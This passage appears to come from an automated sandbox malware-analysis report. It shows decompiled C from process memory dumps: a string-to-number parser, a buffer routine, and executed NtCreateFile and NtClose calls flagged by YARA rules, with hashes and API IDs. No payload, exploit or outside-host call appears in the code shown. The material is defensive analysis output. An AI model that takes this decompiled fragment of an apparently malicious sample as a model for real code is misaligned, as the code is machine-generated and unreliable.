                                                                                                                                                        							_t118 = _v5 & 0x000000ff;
                                                                                                                                                        							_t173 = _t173 | 0xffffffff;
                                                                                                                                                        							__eflags = _t118 - _t173;
                                                                                                                                                        							if(_t118 != _t173) {
                                                                                                                                                        								_t173 = _t118;
                                                                                                                                                        							}
                                                                                                                                                        							_t119 = E00900867();
                                                                                                                                                        							_t163 = 8;
                                                                                                                                                        							__eflags =  *(_t119 + _t173 * 2) & _t163;
                                                                                                                                                        							if(( *(_t119 + _t173 * 2) & _t163) == 0) {
                                                                                                                                                        								break;
                                                                                                                                                        							} else {
                                                                                                                                                        								goto L11;
                                                                                                                                                        							}
                                                                                                                                                        							do {
                                                                                                                                                        								L11:
                                                                                                                                                        								_t145 =  *_t168;
                                                                                                                                                        								_t168 = _t168 + 1;
                                                                                                                                                        								__eflags = _t145 - _v5;
                                                                                                                                                        							} while (_t145 == _v5);
                                                                                                                                                        							_v5 = _t145;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _v5 - 0x2d;
                                                                                                                                                        						_v12 = _t168;
                                                                                                                                                        						if(_v5 != 0x2d) {
                                                                                                                                                        							__eflags = _v5 - 0x2b;
                                                                                                                                                        							if(_v5 != 0x2b) {
                                                                                                                                                        								L17:
                                                                                                                                                        								_t153 = 0x10;
                                                                                                                                                        								__eflags = _a12 - _t148;
                                                                                                                                                        								if(_a12 != _t148) {
                                                                                                                                                        									L24:
                                                                                                                                                        									__eflags = _a12 - _t153;
                                                                                                                                                        									if(_a12 != _t153) {
                                                                                                                                                        										L29:
                                                                                                                                                        										asm("cdq");
                                                                                                                                                        										_t169 = _a12;
                                                                                                                                                        										_v40 = _t163;
                                                                                                                                                        										_t121 = E008CF920(0xffffffff, 0xffffffff, _a12, _t163);
                                                                                                                                                        										_v36 = _t153;
                                                                                                                                                        										_v32 = _t148;
                                                                                                                                                        										_v28 = _t121;
                                                                                                                                                        										_v24 = _t163;
                                                                                                                                                        										while(1) {
                                                                                                                                                        											_t174 = _v5 & 0x000000ff;
                                                                                                                                                        											_t148 = _t148 | 0xffffffff;
                                                                                                                                                        											__eflags = _t174 - _t148;
                                                                                                                                                        											if(_t174 != _t148) {
                                                                                                                                                        												_t148 = _t174;
                                                                                                                                                        											}
                                                                                                                                                        											_t122 = E00900867();
                                                                                                                                                        											__eflags =  *(_t122 + _t148 * 2) & 0x00000004;
                                                                                                                                                        											if(( *(_t122 + _t148 * 2) & 0x00000004) == 0) {
                                                                                                                                                        												goto L34;
                                                                                                                                                        											}
                                                                                                                                                        											_t176 = _v5 - 0x30;
                                                                                                                                                        											L40:
                                                                                                                                                        											__eflags = _t176 - _a12;
                                                                                                                                                        											if(_t176 >= _a12) {
                                                                                                                                                        												L50:
                                                                                                                                                        												_t149 = _a16;
                                                                                                                                                        												_v12 = _v12 - 1;
                                                                                                                                                        												__eflags = _t149 & 0x00000008;
                                                                                                                                                        												if((_t149 & 0x00000008) != 0) {
                                                                                                                                                        													__eflags = _t149 & 0x00000004;
                                                                                                                                                        													if((_t149 & 0x00000004) != 0) {
                                                                                                                                                        														L66:
                                                                                                                                                        														 *0x9a92c4 = 0x22;
                                                                                                                                                        														__eflags = _t149 & 0x00000001;
                                                                                                                                                        														if((_t149 & 0x00000001) == 0) {
                                                                                                                                                        															__eflags = _t149 & 0x00000002;
                                                                                                                                                        															if((_t149 & 0x00000002) == 0) {
                                                                                                                                                        																_t104 =  &_v20;
                                                                                                                                                        																 *_t104 = _v20 | 0xffffffff;
                                                                                                                                                        																__eflags =  *_t104;
                                                                                                                                                        																_v16 = 0x7fffffff;
                                                                                                                                                        															} else {
                                                                                                                                                        																_v20 = _v20 & 0x00000000;
                                                                                                                                                        																_v16 = 0x80000000;
                                                                                                                                                        															}
                                                                                                                                                        														} else {
                                                                                                                                                        															_v20 = _v20 | 0xffffffff;
                                                                                                                                                        															_v16 = _v16 | 0xffffffff;
                                                                                                                                                        														}
                                                                                                                                                        														L71:
                                                                                                                                                        														_t124 = _a8;
                                                                                                                                                        														__eflags = _t124;
                                                                                                                                                        														if(_t124 != 0) {
                                                                                                                                                        															 *_t124 = _v12;
                                                                                                                                                        														}
                                                                                                                                                        														__eflags = _t149 & 0x00000002;
                                                                                                                                                        														if((_t149 & 0x00000002) != 0) {
                                                                                                                                                        															asm("adc ecx, 0x0");
                                                                                                                                                        															_v20 =  ~_v20;
                                                                                                                                                        															_v16 =  ~_v16;
                                                                                                                                                        														}
                                                                                                                                                        														_t125 = _v20;
                                                                                                                                                        														L76:
                                                                                                                                                        														return _t125;
                                                                                                                                                        													}
                                                                                                                                                        													__eflags = _t149 & 0x00000001;
                                                                                                                                                        													if((_t149 & 0x00000001) != 0) {
                                                                                                                                                        														goto L71;
                                                                                                                                                        													}
                                                                                                                                                        													_t129 = _t149 & 0x00000002;
                                                                                                                                                        													__eflags = _t129;
                                                                                                                                                        													if(_t129 == 0) {
                                                                                                                                                        														L62:
                                                                                                                                                        														__eflags = _t129;
                                                                                                                                                        														if(_t129 != 0) {
                                                                                                                                                        															goto L71;
                                                                                                                                                        														}
                                                                                                                                                        														__eflags = _v16 - 0x7fffffff;
                                                                                                                                                        														if(__eflags < 0) {
                                                                                                                                                        															goto L71;
                                                                                                                                                        														}
                                                                                                                                                        														if(__eflags > 0) {
                                                                                                                                                        															goto L66;
                                                                                                                                                        														}
                                                                                                                                                        														__eflags = _v20 - 0xffffffff;
                                                                                                                                                        														if(_v20 <= 0xffffffff) {
                                                                                                                                                        															goto L71;
                                                                                                                                                        														}
                                                                                                                                                        														goto L66;
                                                                                                                                                        													}
                                                                                                                                                        													__eflags = _v16 - 0x80000000;
                                                                                                                                                        													if(__eflags > 0) {
                                                                                                                                                        														goto L66;
                                                                                                                                                        													}
                                                                                                                                                        													if(__eflags < 0) {
                                                                                                                                                        														goto L62;
                                                                                                                                                        													}
                                                                                                                                                        													__eflags = _v20;
                                                                                                                                                        													if(_v20 > 0) {
                                                                                                                                                        														goto L66;
                                                                                                                                                        													}
                                                                                                                                                        													goto L62;
                                                                                                                                                        												}
                                                                                                                                                        												__eflags = _a8;
                                                                                                                                                        												if(_a8 != 0) {
                                                                                                                                                        													_v12 = _a4;
                                                                                                                                                        												}
                                                                                                                                                        												_v20 = 0;
                                                                                                                                                        												_v16 = 0;
                                                                                                                                                        												goto L71;
                                                                                                                                                        											}
                                                                                                                                                        											_t160 = _v16;
                                                                                                                                                        											_a16 = _a16 | 0x00000008;
                                                                                                                                                        											__eflags = _t160 - _v24;
                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                        												L54:
                                                                                                                                                        												_t135 = E008EF1E0(_t169, _v40, _v20, _t160) + _t176;
                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                        												asm("adc edx, ecx");
                                                                                                                                                        												_v20 = _t135;
                                                                                                                                                        												_v16 = _t163;
                                                                                                                                                        												L55:
                                                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                                                        												_v5 =  *_v12;
                                                                                                                                                        												continue;
                                                                                                                                                        											}
                                                                                                                                                        											if(__eflags > 0) {
                                                                                                                                                        												L44:
                                                                                                                                                        												__eflags = _v20 - _v28;
                                                                                                                                                        												if(_v20 != _v28) {
                                                                                                                                                        													L49:
                                                                                                                                                        													_a16 = _a16 | 0x00000004;
                                                                                                                                                        													__eflags = _a8;
                                                                                                                                                        													if(_a8 != 0) {
                                                                                                                                                        														goto L55;
                                                                                                                                                        													}
                                                                                                                                                        													goto L50;
                                                                                                                                                        												}
                                                                                                                                                        												__eflags = _t160 - _v24;
                                                                                                                                                        												if(_t160 != _v24) {
                                                                                                                                                        													goto L49;
                                                                                                                                                        												}
                                                                                                                                                        												__eflags = 0 - _v32;
                                                                                                                                                        												if(__eflags < 0) {
                                                                                                                                                        													goto L54;
                                                                                                                                                        												}
                                                                                                                                                        												if(__eflags > 0) {
                                                                                                                                                        													goto L49;
                                                                                                                                                        												}
                                                                                                                                                        												__eflags = _t176 - _v36;
                                                                                                                                                        												if(_t176 <= _v36) {
                                                                                                                                                        													goto L54;
                                                                                                                                                        												}
                                                                                                                                                        												goto L49;
                                                                                                                                                        											}
                                                                                                                                                        											__eflags = _v20 - _v28;
                                                                                                                                                        											if(_v20 < _v28) {
                                                                                                                                                        												goto L54;
                                                                                                                                                        											}
                                                                                                                                                        											goto L44;
                                                                                                                                                        											L34:
                                                                                                                                                        											__eflags = _t174 - 0xffffffff;
                                                                                                                                                        											if(_t174 == 0xffffffff) {
                                                                                                                                                        												_t174 = _t174;
                                                                                                                                                        												__eflags = _t174;
                                                                                                                                                        											}
                                                                                                                                                        											_t123 = E00900867();
                                                                                                                                                        											__eflags =  *(_t123 + _t174 * 2) & 0x00000103;
                                                                                                                                                        											if(( *(_t123 + _t174 * 2) & 0x00000103) == 0) {
                                                                                                                                                        												goto L50;
                                                                                                                                                        											} else {
                                                                                                                                                        												__eflags = _v5 - 0x61 - 0x19;
                                                                                                                                                        												_t133 = _v5;
                                                                                                                                                        												if(_v5 - 0x61 <= 0x19) {
                                                                                                                                                        													_t133 = _t133 - 0x20;
                                                                                                                                                        													__eflags = _t133;
                                                                                                                                                        												}
                                                                                                                                                        												_t51 = _t133 - 0x37; // -44
                                                                                                                                                        												_t176 = _t51;
                                                                                                                                                        												goto L40;
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _v5 - 0x30;
                                                                                                                                                        									if(_v5 != 0x30) {
                                                                                                                                                        										goto L29;
                                                                                                                                                        									}
                                                                                                                                                        									_t141 =  *_t168;
                                                                                                                                                        									__eflags = _t141 - 0x78;
                                                                                                                                                        									if(_t141 == 0x78) {
                                                                                                                                                        										L28:
                                                                                                                                                        										_t171 = _t168 + 1;
                                                                                                                                                        										_t172 = _t171 + 1;
                                                                                                                                                        										__eflags = _t172;
                                                                                                                                                        										_v5 =  *_t171;
                                                                                                                                                        										_v12 = _t172;
                                                                                                                                                        										goto L29;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t141 - 0x58;
                                                                                                                                                        									if(_t141 != 0x58) {
                                                                                                                                                        										goto L29;
                                                                                                                                                        									}
                                                                                                                                                        									goto L28;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _v5 - 0x30;
                                                                                                                                                        								if(_v5 == 0x30) {
                                                                                                                                                        									_t143 =  *_t168;
                                                                                                                                                        									__eflags = _t143 - 0x78;
                                                                                                                                                        									if(_t143 == 0x78) {
                                                                                                                                                        										L23:
                                                                                                                                                        										_a12 = _t153;
                                                                                                                                                        										goto L24;
                                                                                                                                                        									}
                                                                                                                                                        									__eflags = _t143 - 0x58;
                                                                                                                                                        									if(_t143 == 0x58) {
                                                                                                                                                        										goto L23;
                                                                                                                                                        									}
                                                                                                                                                        									_a12 = _t163;
                                                                                                                                                        									goto L29;
                                                                                                                                                        								}
                                                                                                                                                        								_a12 = 0xa;
                                                                                                                                                        								goto L29;
                                                                                                                                                        							}
                                                                                                                                                        							L16:
                                                                                                                                                        							_t144 =  *_t168;
                                                                                                                                                        							_t168 = _t168 + 1;
                                                                                                                                                        							__eflags = _t168;
                                                                                                                                                        							_v12 = _t168;
                                                                                                                                                        							_v5 = _t144;
                                                                                                                                                        							goto L17;
                                                                                                                                                        						}
                                                                                                                                                        						_a16 = _a16 | 0x00000002;
                                                                                                                                                        						goto L16;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                        					if(_a12 < 2) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _a12 - 0x24;
                                                                                                                                                        					if(_a12 > 0x24) {
                                                                                                                                                        						goto L3;
                                                                                                                                                        					}
                                                                                                                                                        					goto L7;
                                                                                                                                                        				}
                                                                                                                                                        				L3:
                                                                                                                                                        				_push(_t148);
                                                                                                                                                        				_push(_t148);
                                                                                                                                                        				_push(_t148);
                                                                                                                                                        				_push(_t148);
                                                                                                                                                        				_push(_t148);
                                                                                                                                                        				E0094CECC(_t148, _t151, _t162, _t167, _t173);
                                                                                                                                                        				_t125 = 0;
                                                                                                                                                        				goto L76;
                                                                                                                                                        			}










































                                                                                                                                                        0x00975dfd
                                                                                                                                                        0x00975e00
                                                                                                                                                        0x00975e02
                                                                                                                                                        0x00975e04
                                                                                                                                                        0x00975e04
                                                                                                                                                        0x00975e06
                                                                                                                                                        0x00975e0b
                                                                                                                                                        0x00975e0f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e15
                                                                                                                                                        0x00975e44
                                                                                                                                                        0x00975e44
                                                                                                                                                        0x00975e47
                                                                                                                                                        0x00975e84
                                                                                                                                                        0x00975e84
                                                                                                                                                        0x00975e87
                                                                                                                                                        0x00975e8c
                                                                                                                                                        0x00975e8f
                                                                                                                                                        0x00975edc
                                                                                                                                                        0x00975edf
                                                                                                                                                        0x00975f0b
                                                                                                                                                        0x00975f0b
                                                                                                                                                        0x00975f15
                                                                                                                                                        0x00975f18
                                                                                                                                                        0x00975f24
                                                                                                                                                        0x00975f27
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f32
                                                                                                                                                        0x00975f36
                                                                                                                                                        0x00975f29
                                                                                                                                                        0x00975f29
                                                                                                                                                        0x00975f2d
                                                                                                                                                        0x00975f2d
                                                                                                                                                        0x00975f1a
                                                                                                                                                        0x00975f1a
                                                                                                                                                        0x00975f1e
                                                                                                                                                        0x00975f1e
                                                                                                                                                        0x00975f39
                                                                                                                                                        0x00975f39
                                                                                                                                                        0x00975f3c
                                                                                                                                                        0x00975f3e
                                                                                                                                                        0x00975f43
                                                                                                                                                        0x00975f43
                                                                                                                                                        0x00975f45
                                                                                                                                                        0x00975f48
                                                                                                                                                        0x00975f52
                                                                                                                                                        0x00975f57
                                                                                                                                                        0x00975f5a
                                                                                                                                                        0x00975f5a
                                                                                                                                                        0x00975f5d
                                                                                                                                                        0x00975f63
                                                                                                                                                        0x00975f65
                                                                                                                                                        0x00975f65
                                                                                                                                                        0x00975ee1
                                                                                                                                                        0x00975ee4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ee8
                                                                                                                                                        0x00975ee8
                                                                                                                                                        0x00975eeb
                                                                                                                                                        0x00975efa
                                                                                                                                                        0x00975efa
                                                                                                                                                        0x00975efc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975efe
                                                                                                                                                        0x00975f01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f05
                                                                                                                                                        0x00975f09
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975f09
                                                                                                                                                        0x00975eed
                                                                                                                                                        0x00975ef0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef4
                                                                                                                                                        0x00975ef8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ef8
                                                                                                                                                        0x00975e93
                                                                                                                                                        0x00975e96
                                                                                                                                                        0x00975e9b
                                                                                                                                                        0x00975e9b
                                                                                                                                                        0x00975e9e
                                                                                                                                                        0x00975ea1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975ea1
                                                                                                                                                        0x00975e49
                                                                                                                                                        0x00975e4c
                                                                                                                                                        0x00975e50
                                                                                                                                                        0x00975e53
                                                                                                                                                        0x00975ea9
                                                                                                                                                        0x00975eb8
                                                                                                                                                        0x00975eb8
                                                                                                                                                        0x00975eba
                                                                                                                                                        0x00975ebc
                                                                                                                                                        0x00975ebf
                                                                                                                                                        0x00975ec2
                                                                                                                                                        0x00975ec7
                                                                                                                                                        0x00975eca
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975eca
                                                                                                                                                        0x00975e55
                                                                                                                                                        0x00975e5f
                                                                                                                                                        0x00975e62
                                                                                                                                                        0x00975e65
                                                                                                                                                        0x00975e7a
                                                                                                                                                        0x00975e7a
                                                                                                                                                        0x00975e7e
                                                                                                                                                        0x00975e82
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e82
                                                                                                                                                        0x00975e67
                                                                                                                                                        0x00975e6a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e6e
                                                                                                                                                        0x00975e71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e75
                                                                                                                                                        0x00975e78
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e78
                                                                                                                                                        0x00975e5a
                                                                                                                                                        0x00975e5d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e1a
                                                                                                                                                        0x00975e1a
                                                                                                                                                        0x00975e1d
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e1f
                                                                                                                                                        0x00975e21
                                                                                                                                                        0x00975e2b
                                                                                                                                                        0x00975e2f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e31
                                                                                                                                                        0x00975e36
                                                                                                                                                        0x00975e38
                                                                                                                                                        0x00975e3c
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e3e
                                                                                                                                                        0x00975e41
                                                                                                                                                        0x00975e41
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00975e41

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                        • String ID: $$0
                                                                                                                                                        • API String ID: 1302938615-389342756
                                                                                                                                                        • Opcode ID: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                                                                                                                                                        • Instruction ID: b4af61a3e16e0a5ce74abc1b0a8241f57d4b26265c915f8af119a8b66fa8f2c3
                                                                                                                                                        • Opcode Fuzzy Hash: 1407763334a16120dfe45bff2d65f069755870e5c5d3906492eafbf049ff66e8
                                                                                                                                                        • Instruction Fuzzy Hash: B591C032D04A8AAFDF64CF98C4453EDBBB5BF41310F16855AD8A9A72D1C7B44A41CB40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                        			E0097C371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				char _v24;
                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                        				short _t58;
                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                        				signed char _t63;
                                                                                                                                                        				signed int _t65;
                                                                                                                                                        				signed int _t74;
                                                                                                                                                        				signed int _t75;
                                                                                                                                                        				intOrPtr* _t76;
                                                                                                                                                        				signed int _t80;
                                                                                                                                                        				signed int _t82;
                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                        				signed int _t89;
                                                                                                                                                        				signed int _t90;
                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t94;
                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                        
                                                                                                                                                        				_t87 = __edx;
                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                        				_t80 = _a8;
                                                                                                                                                        				_t57 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                        				if(_t57 <= 0) {
                                                                                                                                                        					_t57 =  *((intOrPtr*)(_t80 + 8));
                                                                                                                                                        				}
                                                                                                                                                        				_t97 = _a4;
                                                                                                                                                        				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
                                                                                                                                                        				_t89 =  *((intOrPtr*)(_t97 + 0x80));
                                                                                                                                                        				_t58 = _a12;
                                                                                                                                                        				_a8 = _t89;
                                                                                                                                                        				if(_t57 != 0x48 || _t58 == 1) {
                                                                                                                                                        					 *((short*)(_t80 + 0x34)) = _t58;
                                                                                                                                                        					 *((intOrPtr*)(_t80 + 0x10)) = E0097BCFC();
                                                                                                                                                        					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
                                                                                                                                                        					__eflags =  *(_t97 + 0x5c);
                                                                                                                                                        					if( *(_t97 + 0x5c) == 0) {
                                                                                                                                                        						goto L25;
                                                                                                                                                        					}
                                                                                                                                                        					_t61 =  *((intOrPtr*)(_t80 + 0x30));
                                                                                                                                                        					__eflags = _t61 - _t89;
                                                                                                                                                        					if(_t61 < _t89) {
                                                                                                                                                        						_t78 = _t61 + _t80;
                                                                                                                                                        						__eflags = _t61 + _t80;
                                                                                                                                                        						E008CDFC0(_t78, 0xff, _t89 - _t61);
                                                                                                                                                        					}
                                                                                                                                                        					_t90 =  *(_t97 + 0xcc);
                                                                                                                                                        					_t63 = _t90 >> 3;
                                                                                                                                                        					__eflags = _t63 & 0x00000001;
                                                                                                                                                        					if((_t63 & 0x00000001) != 0) {
                                                                                                                                                        						_v16 = 2;
                                                                                                                                                        					}
                                                                                                                                                        					_t82 =  *(_t97 + 0xc8);
                                                                                                                                                        					__eflags = _t82;
                                                                                                                                                        					if(_t82 <= 0) {
                                                                                                                                                        						L18:
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_t91 = _t97 + 0xf0;
                                                                                                                                                        						_push(_t91);
                                                                                                                                                        						_push(_a8);
                                                                                                                                                        						_push(_t80);
                                                                                                                                                        						_push( &_v24);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_push(0);
                                                                                                                                                        						_t65 = E008BF938( *(_t97 + 0x5c));
                                                                                                                                                        						_v8 = _t65;
                                                                                                                                                        						__eflags = _t65;
                                                                                                                                                        						if(_t65 < 0) {
                                                                                                                                                        							__eflags = _t65 - 0x80000022;
                                                                                                                                                        							if(_t65 == 0x80000022) {
                                                                                                                                                        								goto L25;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _v8 - 2;
                                                                                                                                                        							if(_v8 == 2) {
                                                                                                                                                        								goto L25;
                                                                                                                                                        							}
                                                                                                                                                        							goto L24;
                                                                                                                                                        						}
                                                                                                                                                        						 *_t91 =  *_t91 + _a8;
                                                                                                                                                        						asm("adc dword [edi+0x4], 0x0");
                                                                                                                                                        						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
                                                                                                                                                        						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
                                                                                                                                                        						goto L25;
                                                                                                                                                        					} else {
                                                                                                                                                        						asm("sbb eax, eax");
                                                                                                                                                        						asm("cdq");
                                                                                                                                                        						_v12 = E008EF1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
                                                                                                                                                        						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
                                                                                                                                                        						_t75 = _t74 * _a8;
                                                                                                                                                        						__eflags = _t74 * _a8 >> 0x20 - _t87;
                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                        							goto L18;
                                                                                                                                                        						}
                                                                                                                                                        						if(__eflags > 0) {
                                                                                                                                                        							L14:
                                                                                                                                                        							_t93 = (_t90 & 0x0000000b) - 1;
                                                                                                                                                        							__eflags = _t93;
                                                                                                                                                        							if(_t93 == 0) {
                                                                                                                                                        								_v8 = 0xc0000188;
                                                                                                                                                        								L24:
                                                                                                                                                        								_t54 = _t97 + 0xfc;
                                                                                                                                                        								 *_t54 =  *(_t97 + 0xfc) + 1;
                                                                                                                                                        								__eflags =  *_t54;
                                                                                                                                                        								goto L25;
                                                                                                                                                        							}
                                                                                                                                                        							_t94 = _t93 - 1;
                                                                                                                                                        							__eflags = _t94;
                                                                                                                                                        							if(_t94 == 0) {
                                                                                                                                                        								_t76 = _t97 + 0xe8;
                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
                                                                                                                                                        								_t86 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0xd8)) = E00904FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
                                                                                                                                                        							} else {
                                                                                                                                                        								__eflags = _t94 == 6;
                                                                                                                                                        								if(_t94 == 6) {
                                                                                                                                                        									_t34 = _t97 + 0xd4;
                                                                                                                                                        									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
                                                                                                                                                        									__eflags =  *_t34;
                                                                                                                                                        								}
                                                                                                                                                        							}
                                                                                                                                                        							goto L18;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _t75 - _v12;
                                                                                                                                                        						if(_t75 < _v12) {
                                                                                                                                                        							goto L18;
                                                                                                                                                        						}
                                                                                                                                                        						goto L14;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					_v8 = 0x80000022;
                                                                                                                                                        					L25:
                                                                                                                                                        					return _v8;
                                                                                                                                                        				}
                                                                                                                                                        			}

























                                                                                                                                                        APIs
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097C4BC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                        • String ID: "$409
                                                                                                                                                        • API String ID: 885266447-4048699559
                                                                                                                                                        • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                        • Instruction ID: b4ca74dd8bf72a59c8c96fdccf03a962acd6012227abaaae28dcf27ac322c8a1
                                                                                                                                                        • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                        • Instruction Fuzzy Hash: 9F417CB2600605EFDB24DF68C885BBAB7B9FB44304F14C86DE95ADB252D774E940CB50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Executed Functions

                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00094B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094B87,007A002E,00000000,00000060,00000000,00000000), ref: 00099DAD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL( M,?,?,00094D20,00000000,FFFFFFFF), ref: 00099EB5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: M
                                                                                                                                                        • API String ID: 3535843008-4211545630
